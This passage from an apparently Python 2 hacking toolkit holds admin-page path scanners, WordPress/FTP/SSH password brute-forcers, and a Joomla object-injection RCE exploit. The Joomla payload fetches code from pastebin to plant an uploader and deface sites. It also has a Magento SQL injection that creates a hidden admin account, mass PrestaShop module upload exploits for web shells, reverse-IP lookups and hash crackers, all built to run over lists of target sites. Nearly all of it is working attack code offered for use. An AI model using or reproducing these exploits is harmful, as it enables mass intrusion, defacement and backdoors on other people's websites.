'adm/index.cgi','adm.cgi','affiliate.cgi','adm_auth.cgi','memberadmin.cgi','administratorlogin.cgi'] | |
brf = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', | |
'memberadmin/','administratorlogin/','adm/','admin/account.brf','admin/index.brf','admin/login.brf','admin/admin.brf','admin/account.brf', | |
'admin_area/admin.brf','admin_area/login.brf','siteadmin/login.brf','siteadmin/index.brf','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', | |
'admin_area/index.brf','bb-admin/index.brf','bb-admin/login.brf','bb-admin/admin.brf','admin/home.brf','admin_area/login.html','admin_area/index.html', | |
'admin/controlpanel.brf','admin.brf','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', | |
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', | |
'admin/cp.brf','cp.brf','administrator/index.brf','administrator/login.brf','nsw/admin/login.brf','webadmin/login.brfbrf','admin/admin_login.brf','admin_login.brf', | |
'administrator/account.brf','administrator.brf','acceso.brf','admin_area/admin.html','pages/admin/admin-login.brf','admin/admin-login.brf','admin-login.brf', | |
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.brf','modelsearch/login.brf','moderator.brf','moderator/login.brf', | |
'moderator/admin.brf','account.brf','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.brf','admincontrol.brf', | |
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.brf','adminarea/index.html','adminarea/admin.html', | |
'webadmin.brf','webadmin/index.brf','webadmin/admin.brf','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.brf','moderator.html', | |
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', | |
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', | |
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.brf','account.html','controlpanel.html','admincontrol.html', | |
'panel-administracion/login.brf','wp-login.brf','adminLogin.brf','admin/adminLogin.brf','home.brf','admin.brf','adminarea/index.brf', | |
'adminarea/admin.brf','adminarea/login.brf','panel-administracion/index.brf','panel-administracion/admin.brf','modelsearch/index.brf', | |
'modelsearch/admin.brf','admincontrol/login.brf','adm/admloginuser.brf','admloginuser.brf','admin2.brf','admin2/login.brf','admin2/index.brf','usuarios/login.brf', | |
'adm/index.brf','adm.brf','affiliate.brf','adm_auth.brf','memberadmin.brf','administratorlogin.brf'] | |
def php_admin(self,url): | |
php = self.php | |
for admin in php: | |
admin=admin.strip() | |
full = url+"/"+admin | |
r = request_get(full) | |
get = r.status_code | |
if get == 200: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Admin Page Found ! : "+color.ENDC+full) | |
elif get == 403: | |
print (color.R+color.BOLD+"[-]"+color.BOLD+" Forbidden : "+color.ENDC+full) | |
elif get == 302: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Redirect : "+color.ENDC+full) | |
elif get==404: | |
print (color.W+color.BOLD+"[-]"+color.BOLD+" Not Found : "+color.ENDC+full) | |
else: | |
print (color.W+color.BOLD+"[-] Response "+str(get)+" : "+full) | |
def asp_admin(self,url): | |
asp = self.asp | |
for admin in asp: | |
admin=admin.strip() | |
full = url+"/"+admin | |
r = request_get(full) | |
get = r.status_code | |
if get == 200: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Admin Page Found ! : "+color.ENDC+full) | |
elif get == 403: | |
print (color.R+color.BOLD+"[-]"+color.BOLD+" Forbidden : "+color.ENDC+full) | |
elif get == 302: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Redirect : "+color.ENDC+full) | |
elif get==404: | |
print (color.W+color.BOLD+"[-]"+color.BOLD+" Not Found : "+color.ENDC+full) | |
else: | |
print (color.W+color.BOLD+"[-] Response "+str(get)+" : "+full) | |
def cfm_admin(self,url): | |
cfm = self.cfm | |
for admin in cfm: | |
admin=admin.strip() | |
full = url+"/"+admin | |
r = request_get(full) | |
get = r.status_code | |
if get == 200: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Admin Page Found ! : "+color.ENDC+full) | |
elif get == 403: | |
print (color.R+color.BOLD+"[-]"+color.BOLD+" Forbidden : "+color.ENDC+full) | |
elif get == 302: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Redirect : "+color.ENDC+full) | |
elif get==404: | |
print (color.W+color.BOLD+"[-]"+color.BOLD+" Not Found : "+color.ENDC+full) | |
else: | |
print (color.W+color.BOLD+"[-] Response "+str(get)+" : "+full) | |
def js_admin(self,url): | |
js = self.js | |
for admin in js: | |
admin=admin.strip() | |
full = url+"/"+admin | |
r = request_get(full) | |
get = r.status_code | |
if get == 200: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Admin Page Found ! : "+color.ENDC+full) | |
elif get == 403: | |
print (color.R+color.BOLD+"[-]"+color.BOLD+" Forbidden : "+color.ENDC+full) | |
elif get == 302: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Redirect : "+color.ENDC+full) | |
elif get==404: | |
print (color.W+color.BOLD+"[-]"+color.BOLD+" Not Found : "+color.ENDC+full) | |
else: | |
print (color.W+color.BOLD+"[-] Response "+str(get)+" : "+full) | |
def cgi_admin(self,url): | |
cgi = self.cgi | |
for admin in cgi: | |
admin=admin.strip() | |
full = url+"/"+admin | |
r = request_get(full) | |
get = r.status_code | |
if get == 200: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Admin Page Found ! : "+color.ENDC+full) | |
elif get == 403: | |
print (color.R+color.BOLD+"[-]"+color.BOLD+" Forbidden : "+color.ENDC+full) | |
elif get == 302: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Redirect : "+color.ENDC+full) | |
elif get==404: | |
print (color.W+color.BOLD+"[-]"+color.BOLD+" Not Found : "+color.ENDC+full) | |
else: | |
print (color.W+color.BOLD+"[-] Response "+str(get)+" : "+full) | |
def brf_admin(self,url): | |
brf = self.brf | |
for admin in brf: | |
admin=admin.strip() | |
full = url+"/"+admin | |
r = request_get(full) | |
get = r.status_code | |
if get == 200: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Admin Page Found ! : "+color.ENDC+full) | |
elif get == 403: | |
print (color.R+color.BOLD+"[-]"+color.BOLD+" Forbidden : "+color.ENDC+full) | |
elif get == 302: | |
print (color.Y+color.BOLD+"[+]"+color.BOLD+" Redirect : "+color.ENDC+full) | |
elif get==404: | |
print (color.W+color.BOLD+"[-]"+color.BOLD+" Not Found : "+color.ENDC+full) | |
else: | |
print (color.W+color.BOLD+"[-] Response "+str(get)+" : "+full) | |
### | |
###BRUTEFORCING TOOLS | |
### | |
#################################### | |
## ## | |
## BruteForcing WP/JM/FTP/SSH ## | |
## ## | |
#################################### | |
class BruteForce: | |
def wordpress(self, url, username,wordlist): | |
headers = { | |
'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0' | |
} | |
#ok = time.strftime("%H:%M:%S") | |
time.ctime() | |
ok = time.strftime('%H:%M:%S') | |
datetime = '['+ok+']' | |
url = "http://"+url+"/wp-login.php" | |
if not request_get(url).status_code == 200: | |
print ("Error with : "+url+"\nResponse is : "+str(request_get(url).status_code)) | |
return 1 | |
print (color.G+datetime+color.ENDC+" Starting Attack ! ") | |
print (color.G+datetime+color.W+" wordpress : "+color.Y+url) | |
word = open(wordlist, 'r') | |
word = word.readlines() | |
for words in word: | |
words = words.strip() | |
payload = {'log' : username, | |
'pwd' : words} | |
s = request_post(url, data=payload, headers=headers) | |
print (color.R+"------------------------------------------------------------------") | |
print (color.G+datetime+color.W+" username : "+color.Y+payload['log']) | |
print (color.G+datetime+color.W+" password : "+color.Y+payload['pwd']) | |
if "wp-admin" in s.url: | |
print (color.G+datetime+color.R+" Login Succes"+color.ENDC) | |
print (color.R+"------------------------------------------------------------------"+color.ENDC) | |
break | |
elif "wp-login.php" in s.url: | |
print (color.G+datetime+color.C+" Login False"+color.ENDC) | |
def ftp_brute(self,hostname, username, password): | |
try: | |
ftp = FTP(hostname) | |
login = ftp.login(username, password) | |
if "230" in login: | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" LOGIN SUCCESSFULLY WITH"+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Password : "+password+color.ENDC) | |
sys.exit(0) | |
except ftplib.error_perm: | |
print (color.R+color.BOLD+"[-]"+color.ENDC+color.BOLD+" Error via Password : "+password+color.ENDC) | |
pass | |
def ssh_brute(self,hostname, username, password): | |
try: | |
s = pxssh.pxssh() | |
login = s.login(hostname, username, password) | |
if login == True: | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" LOGIN SUCCESSFULLY WITH"+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Password : "+password+color.ENDC) | |
except pexpect.pxssh.ExceptionPxssh: | |
print (color.R+color.BOLD+"[-]"+color.ENDC+color.BOLD+" Error via Password : "+password+color.ENDC) | |
pass | |
### | |
###RCE EXPLOIT | |
### | |
#################################### | |
## ## | |
## Add RCE joomla & Magento ## | |
## ## | |
#################################### | |
class exploit: | |
def joomla(self, wordlist): | |
wordlist = open(wordlist, "r") | |
def get_url(url, user_agent): | |
headers = { | |
'User-Agent': user_agent | |
} | |
cookies = request_get(url,headers=headers).cookies | |
for _ in range(3): | |
response = request_get(url, headers=headers,cookies=cookies) | |
return response.content | |
def php_str_noquotes(data): | |
encoded = "" | |
for char in data: | |
encoded += "chr({0}).".format(ord(char)) | |
return encoded[:-1] | |
def generate_payload(php_payload): | |
php_payload = "eval({0})".format(php_str_noquotes(php_payload)) | |
terminate = '\xf0\xfd\xfd\xfd'; | |
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' | |
injected_payload = "{};JFactory::getConfig();exit".format(php_payload) | |
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) | |
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate | |
return exploit_template | |
pl = generate_payload("fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/up.php','w+'),file_get_contents('http://pastebin.com/raw/uWVsQH53')); fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/x.htm','w+'),'Hacked by Black Eye');") | |
for i in wordlist.readlines(): | |
i=i.strip() | |
get_url(i, pl) | |
lala=request_get(i+"/x.htm") | |
if "Hacked" in lala.content: | |
print i+"/x.htm : Defaced | /up.php uploader file " | |
z=open('Joomla_3.5_Shell.txt','a') | |
z.write(i+"/x.htm\n") | |
z.close() | |
else: | |
print i+" : Not Defaced" | |
wordlist.close() | |
def magento(self, wordlist): | |
wordlist = open(wordlist, "r") | |
for site in wordlist.readlines(): | |
site = site.strip() | |
target_url = site + "/admin/Cms_Wysiwyg/directive/index/" | |
if not target_url.startswith("http"): | |
target_url = "http://" + target_url | |
if target_url.endswith("/"): | |
target_url = target_url[:-1] | |
q=""" | |
SET @SALT = 'rp'; | |
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT )); | |
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL; | |
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW()); | |
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');""" | |
query = q.replace("\n", "").format(username="form", password="form") | |
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query) | |
# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}} | |
r = request_post(target_url, | |
data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ", | |
"filter": base64.b64encode(pfilter), | |
"forwarded": 1}) | |
if r.ok: | |
print "{0}/admin with login : form:form".format(target_url) | |
else: | |
print "NOT WORKED with {0}".format(target_url) | |
def presta_run(self, lists, script): | |
### | |
### SimpleSlideShow Exploit | |
### | |
def sss_ex(lists, script): | |
print (color.M+color.BOLD+"[+] "+color.ENDC+color.BOLD+"SimpleSlideShow Exploit :"+color.ENDC) | |
lists = open(lists,"r") | |
lists = lists.readlines() | |
for url in lists: | |
url=url.strip() | |
url = url + "/modules/simpleslideshow/uploadimage.php" | |
files={'userfile':(script, open(script,'rb'),'multipart/form-data')} | |
req=request_post(url,files=files) | |
url=url.replace('/uploadimage.php','/slides/'+script) | |
if 'uploadshell' in req.text: | |
print (url+" :"+color.BL+color.BOLD+" UPLOADED") | |
else: | |
print (url+" :"+color.R+color.BOLD+" ERROR"+color.ENDC) | |
### | |
### productpageadverts | |
### | |
def ppa_ex(lists, script): | |
print (color.M+color.BOLD+"[+] "+color.ENDC+color.BOLD+"Productpageadverts Exploit :"+color.ENDC) | |
lists = open(lists,"r") | |
lists = lists.readlines() | |
for url in lists: | |
url=url.strip() | |
url = url + "/modules/productpageadverts/uploadimage.php" | |
files={'userfile':(script, open(script,'rb'),'multipart/form-data')} | |
req=request_post(url,files=files) | |
url=url.replace('/uploadimage.php','/slides/'+script) | |
if 'uploadshell' in req.text: | |
print (url+" :"+color.BL+color.BOLD+" UPLOADED") | |
else: | |
print (url+" :"+color.R+color.BOLD+" ERROR"+color.ENDC) | |
### | |
### HomePageAdvertise | |
### | |
def hpa_ex(lists, script): | |
print (color.M+color.BOLD+"[+] "+color.ENDC+color.BOLD+"HomePageAdvertise Exploit :"+color.ENDC) | |
lists = open(lists,"r") | |
lists = lists.readlines() | |
for url in lists: | |
url=url.strip() | |
url = url + "/modules/homepageadvertise/uploadimage.php" | |
files={'userfile':(script, open(script,'rb'),'multipart/form-data')} | |
req=request_post(url,files=files) | |
url=url.replace('/uploadimage.php','/slides/'+script) | |
if 'uploadshell' in req.text: | |
print (url+" :"+color.BL+color.BOLD+" UPLOADED") | |
else: | |
print (url+" :"+color.R+color.BOLD+" ERROR"+color.ENDC) | |
### | |
### ColumnAdvers | |
### | |
def ca_ex(lists, script): | |
print (color.M+color.BOLD+"[+] "+color.ENDC+color.BOLD+"ColumnAdvers Exploit :"+color.ENDC) | |
lists = open(lists,"r") | |
lists = lists.readlines() | |
for url in lists: | |
url=url.strip() | |
url = url + "/modules/columnadverts/uploadimage.php" | |
files={'userfile':(script, open(script,'rb'),'multipart/form-data')} | |
req=request_post(url,files=files) | |
url=url.replace('/uploadimage.php','/slides/'+script) | |
if 'uploadshell' in req.text: | |
print (url+" :"+color.BL+color.BOLD+" UPLOADED") | |
else: | |
print (url+" :"+color.R+color.BOLD+" ERROR"+color.ENDC) | |
### | |
### vtemslideshow | |
### | |
def vtss_ex(lists, script): | |
print (color.M+color.BOLD+"[+] "+color.ENDC+color.BOLD+"Vtemslideshow Exploit :"+color.ENDC) | |
lists = open(lists,"r") | |
lists = lists.readlines() | |
for url in lists: | |
url=url.strip() | |
url = url + "modules/vtemslideshow/uploadimage.php" | |
files={'userfile':(script, open(script,'rb'),'multipart/form-data')} | |
req=request_post(url,files=files) | |
url=url.replace('/uploadimage.php','/slides/'+script) | |
if 'uploadshell' in req.text: | |
print (url+" :"+color.BL+color.BOLD+" UPLOADED") | |
else: | |
print (url+" :"+color.R+color.BOLD+" ERROR"+color.ENDC) | |
### | |
### attributewizardpro | |
### | |
def awp_ex(lists, script): | |
print (color.M+color.BOLD+"[+] "+color.ENDC+color.BOLD+"Attributewizardpro Exploit :"+color.ENDC) | |
lists = open(lists,"r") | |
lists = lists.readlines() | |
for url in lists: | |
url=url.strip() | |
url = url + "/modules/attributewizardpro/file_upload.php" | |
files={'userfile':(script, open(script,'rb'),'multipart/form-data')} | |
req=request_post(url,files=files) | |
url=url.replace('/uploadimage.php','/slides/'+script) | |
if 'uploadshell' in req.text: | |
print (url+" :"+color.BL+color.BOLD+" UPLOADED") | |
else: | |
print (url+" :"+color.R+color.BOLD+" ERROR"+color.ENDC) | |
### | |
### additionalproductstabs | |
### | |
def aps_ex(lists, script): | |
print (color.M+color.BOLD+"[+] "+color.ENDC+color.BOLD+"Additionalproductstabs Exploit :"+color.ENDC) | |
lists = open(lists,"r") | |
lists = lists.readlines() | |
for url in lists: | |
url=url.strip() | |
url = url + "/modules/additionalproductstabs/file_upload.php" | |
files={'userfile':(script, open(script,'rb'),'multipart/form-data')} | |
req=request_post(url,files=files) | |
url=url.replace('/uploadimage.php','/slides/'+script) | |
if 'uploadshell' in req.text: | |
print (url+" :"+color.BL+color.BOLD+" UPLOADED") | |
else: | |
print (url+" :"+color.R+color.BOLD+" ERROR"+color.ENDC) | |
### | |
### addthisplugin | |
### | |
def atp_ex(lists, script): | |
print (color.M+color.BOLD+"[+] "+color.ENDC+color.BOLD+"Addthisplugin Exploit :"+color.ENDC) | |
lists = open(lists,"r") | |
lists = lists.readlines() | |
for url in lists: | |
url=url.strip() | |
url = url + "/modules/addthisplugin/file_upload.php" | |
files={'userfile':(script, open(script,'rb'),'multipart/form-data')} | |
req=request_post(url,files=files) | |
url=url.replace('/uploadimage.php','/slides/'+script) | |
if 'uploadshell' in req.text: | |
print (url+" :"+color.BL+color.BOLD+" UPLOADED") | |
else: | |
print (url+" :"+color.R+color.BOLD+" ERROR"+color.ENDC) | |
### | |
### advancedslider | |
### | |
def as_ex(lists, script): | |
print (color.M+color.BOLD+"[+] "+color.ENDC+color.BOLD+"Advancedslider Exploit :"+color.ENDC) | |
lists = open(lists,"r") | |
lists = lists.readlines() | |
for url in lists: | |
url=url.strip() | |
url = url + "/modules/advancedslider/file_upload.php" | |
files={'userfile':(script, open(script,'rb'),'multipart/form-data')} | |
req=request_post(url,files=files) | |
url=url.replace('/uploadimage.php','/slides/'+script) | |
if 'uploadshell' in req.text: | |
print (url+" :"+color.BL+color.BOLD+" UPLOADED") | |
else: | |
print (url+" :"+color.R+color.BOLD+" ERROR"+color.ENDC) | |
l = open(lists,"r") | |
l = l.readlines() | |
print (color.M+color.BOLD+"[+]"+color.BOLD+color.W+" "+str(len(l))+" URL FOUNDED") | |
#Start SimpleSlideShow Exploit | |
sss_ex(lists, script) | |
#Start productpageadverts Exploit | |
ppa_ex(lists, script) | |
#Start HomePageAdvertise Exploit | |
hpa_ex(lists, script) | |
#Start ColumnAdvers Exploit | |
ca_ex(lists, script) | |
#Start vtemslideshow Exploit | |
vtss_ex(lists, script) | |
#Start attributewizardpro Exploit | |
awp_ex(lists, script) | |
#Start additionalproductstabs | |
aps_ex(lists, script) | |
#Start addthisplugin | |
atp_ex(lists, script) | |
#Start advancedslider | |
as_ex(lists, script) | |
#FINISH ! | |
print (color.M+color.BOLD+"[+] "+color.BOLD+color.W+"END OF ATTACK") | |
### | |
###DNS INFO | |
### | |
#################################### | |
## ## | |
## Get Website from IP ## | |
## ## | |
#################################### | |
class dnsinfo: | |
def yougetsignal(self, ip): | |
def Details(): | |
yougetsignal = 'http://domains.yougetsignal.com/domains.php' | |
data = { | |
'remoteAddress': ip, | |
'key' : ''} | |
headers={ | |
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0', | |
'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8'} | |
get = request_post(yougetsignal, data=data, headers=headers) | |
get = get.text | |
ok = json.loads(get) | |
return ok | |
def rzlt(details): | |
print (color.G+"Domains Hosted : "+color.W+color.BOLD+details['domainCount']+color.ENDC) | |
print (color.G+"IP Address : "+color.W+color.BOLD+details['remoteIpAddress']+color.ENDC) | |
print (color.G+"Remote Address : "+color.W+color.BOLD+details['remoteAddress']+color.ENDC) | |
ipp = details['remoteIpAddress'] | |
rzt = open(ipp+".txt" ,'a') | |
for domains,bl in details['domainArray']: | |
rzt.write(domains+"\n") | |
rzt.close | |
print (color.W+color.BOLD+"Domains is saved in "+ipp+".txt"+color.ENDC) | |
details = Details() | |
rzlt(details) | |
def viewdns(self,ip): | |
url = "http://viewdns.info/reverseip/?host="+ip+"&t=1" | |
headers = { | |
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1' | |
} | |
r = request_get(url, headers=headers) | |
text = r.content | |
sites = re.findall(r"<tr>\s+<td>(.*?)</td><td align=", text) | |
ipp = open(ip+".txt" ,'a') | |
for i in sites: | |
i=i.strip() | |
ipp.write(i+"\n") | |
print (color.W+color.BOLD+"[+] "+str(len(sites))+" FOUND"+color.ENDC) | |
print (color.W+color.BOLD+"[+] Domains is saved in "+ip+".txt"+color.ENDC) | |
def hackertarget(self,domain): | |
urll = [] | |
url = "http://api.hackertarget.com/reverseiplookup/?q="+domain | |
get = request_get(url) | |
html = get.content | |
if "No records found for" in html: | |
print"No Websites Found At "+domain | |
else: | |
black = re.findall(r'(.*)', html) | |
black = ' '.join(black).split() | |
ipp = open(domain+".txt" ,'a') | |
for i in black: | |
i = i.strip() | |
urll.append(i) | |
ipp.write(i+"\n") | |
print (color.W+color.BOLD+"[+] "+str(len(black))+" FOUND"+color.ENDC) | |
print (color.W+color.BOLD+"[+] Domains is saved in "+domain+".txt"+color.ENDC) | |
### | |
###HASH CRACKER | |
### | |
#################################### | |
## ## | |
## HASH CRACKER ## | |
## ## | |
#################################### | |
class cracker: | |
def md5(self, md5, wordlist): | |
start = timeit.default_timer() | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" MD5 HASH PATH : "+md5+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
wordlist = open(wordlist, "r") | |
word = wordlist.readlines() | |
md5 = open(md5, "r") | |
md5 = md5.readlines() | |
var = 0 | |
for i in word: | |
i=i.strip() | |
for o in md5: | |
o=o.strip() | |
wordlistmd5 = hashlib.md5(o).hexdigest() | |
if i==wordlistmd5: | |
print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+o+" : "+i+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
def sha1(self, sha1, wordlist): | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" SHA1 HASH PATH : "+sha1+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
start = timeit.default_timer() | |
wordlist = open(wordlist, "r") | |
word = wordlist.readlines() | |
sha1 = open(sha1, "r") | |
sha1 = sha1.readlines() | |
var=0 | |
for i in word: | |
i=i.strip() | |
for o in sha1: | |
o=o.strip() | |
wordlistsha1 = hashlib.sha1(o).hexdigest() | |
if i==wordlistsha1: | |
print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+o+" : "+i+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
def sha224(self, sha224, wordlist): | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" SHA224 HASH PATH : "+sha224+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
start = timeit.default_timer() | |
wordlist = open(wordlist, "r") | |
word = wordlist.readlines() | |
sha224 = open(sha224, "r") | |
sha224 = sha224.readlines() | |
var=0 | |
for i in word: | |
i=i.strip() | |
for o in sha224: | |
o=o.strip() | |
wordlistsha1 = hashlib.sha224(o).hexdigest() | |
if i==wordlistsha1: | |
print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+o+" : "+i+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
def sha256(self, sha256, wordlist): | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" SHA256 HASH PATH : "+sha256+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
start = timeit.default_timer() | |
wordlist = open(wordlist, "r") | |
word = wordlist.readlines() | |
sha256 = open(sha256, "r") | |
sha256 = sha256.readlines() | |
var=0 | |
for i in word: | |
i=i.strip() | |
for o in sha256: | |
o=o.strip() | |
wordlistsha1 = hashlib.sha256(o).hexdigest() | |
if i==wordlistsha1: | |
print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+o+" : "+i+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
def sha384(self, sha384, wordlist): | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" SHA384 HASH PATH : "+sha384+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
start = timeit.default_timer() | |
wordlist = open(wordlist, "r") | |
word = wordlist.readlines() | |
sha384 = open(sha384, "r") | |
sha384 = sha384.readlines() | |
var=0 | |
for i in word: | |
i=i.strip() | |
for o in sha384: | |
o=o.strip() | |
wordlistsha1 = hashlib.sha384(o).hexdigest() | |
if i==wordlistsha1: | |
print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+o+" : "+i+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
def sha512(self, sha512, wordlist): | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" SHA512 HASH PATH : "+sha512+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
start = timeit.default_timer() | |
wordlist = open(wordlist, "r") | |
word = wordlist.readlines() | |
sha512 = open(sha512, "r") | |
sha512 = sha512.readlines() | |
var=0 | |
for i in word: | |
i=i.strip() | |
for o in sha512: | |
o=o.strip() | |
wordlistsha1 = hashlib.sha512(o).hexdigest() | |
if i==wordlistsha1: | |
print (color.G+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Hash Found :\n"+color.G+color.BOLD+"[+] "+color.ENDC+color.BOLD+o+" : "+i+color.ENDC) | |
var+=1 | |
if var==0: | |
print color.R+color.BOLD+"[-]"+color.W+" HASH NOT FOUND!"+color.ENDC | |
else: | |
pass | |
stop = timeit.default_timer() | |
print (color.BL+color.BOLD+"[+]"+color.ENDC+color.BOLD+" Elapsed Time : "+str(stop - start)+"s"+color.ENDC) | |
def ntlm(self,wordlist, ha): | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" NTLM HASH PATH : "+ha+color.ENDC) | |
print (color.Y+color.BOLD+"[+]"+color.ENDC+color.BOLD+" WORDLIST PATH : "+wordlist+color.ENDC) | |
start = timeit.default_timer() | |
wordlist = open(wordlist, "r") | |
wordlist = wordlist.readlines() | |
ha = open(ha, "r") | |
ha = ha.readlines() | |
var=0 | |
for word in wordlist: | |
word=word.strip() | |
h = nthash.encrypt(word) | |
for has in ha: | |
if has == h: | |
